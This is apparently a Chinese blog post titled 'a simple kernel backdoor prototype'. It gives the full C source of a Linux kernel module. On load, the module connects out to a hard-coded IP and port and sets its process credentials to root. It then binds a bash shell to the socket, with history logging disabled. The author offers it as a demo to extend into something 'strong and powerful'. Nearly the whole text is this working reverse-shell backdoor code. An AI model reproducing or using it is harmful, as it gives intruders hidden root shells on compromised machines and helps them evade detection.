一个简单的内核后门原型

wzt <wzt#xsec.org>

这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
 * Kernel mode connect backdoor,haha~
 *
 * just a demo module to teach you how to write a backdoor in kernel mode,
 * i belive you can add more code to make it strong and powerful,wulala.
 *
 * by wzt <wzt#xsec.org>
 *
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"

#define REMOTO_IP "192.168.75.1"
#define port 1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
 "TERM=linux",
 "HOME=" HOME,
 "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
 ":/usr/local/sbin",
 "HISTFILE=/dev/null",
 NULL };
 
int k_connect(void)
{
 struct task_struct *tsk = current;
 struct socket *sock,*newsock;
 struct sockaddr_in server;
 int sockfd,i;
 int error = 0,len = sizeof(struct sockaddr);
 
 set_fs(KERNEL_DS);
 
 error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
 if (error < 0) {
 printk("[-] socket_create failed: %d/n",error);
 sock_release(sock);
 return -1;
 }
 
 sockfd = sock_map_fd(sock);
 if (sockfd < 0) {
 printk("[-] sock_map_fd() failed./n");
 sock_release(sock);
 return -1;
 }

 for (i = 0; i < 8; i++)
 server.sin_zero[i] = 0;

 server.sin_family = PF_INET;
 server.sin_addr.s_addr = in_aton(REMOTO_IP);
 server.sin_port = htons(port);

 error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
 if (error < 0) {
 printk("[-] connect to %s failed./n",REMOTO_IP);
 return -1;
 }

 printk("[+] connect to %s ok./n",REMOTO_IP);
 
 set_fs(KERNEL_DS);
 
 tsk->uid = 0;
 tsk->euid = 0;
 tsk->gid = 0x11111111;
 tsk->egid = 0;
 
 dup2(sockfd,0);
 dup2(sockfd,1);
 dup2(sockfd,2);
 
 execve(earg[0], (const char **) earg, (const char **) env);
 
 return 1;
}

int k_socket_init(void)
{
 printk("[+] kernel socket test start./n");
 
 k_connect();
}

void k_socket_exit(void)
{
 printk("[+] kernel socket test over./n");
}

module_init(k_socket_init);
module_exit(k_socket_exit); 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值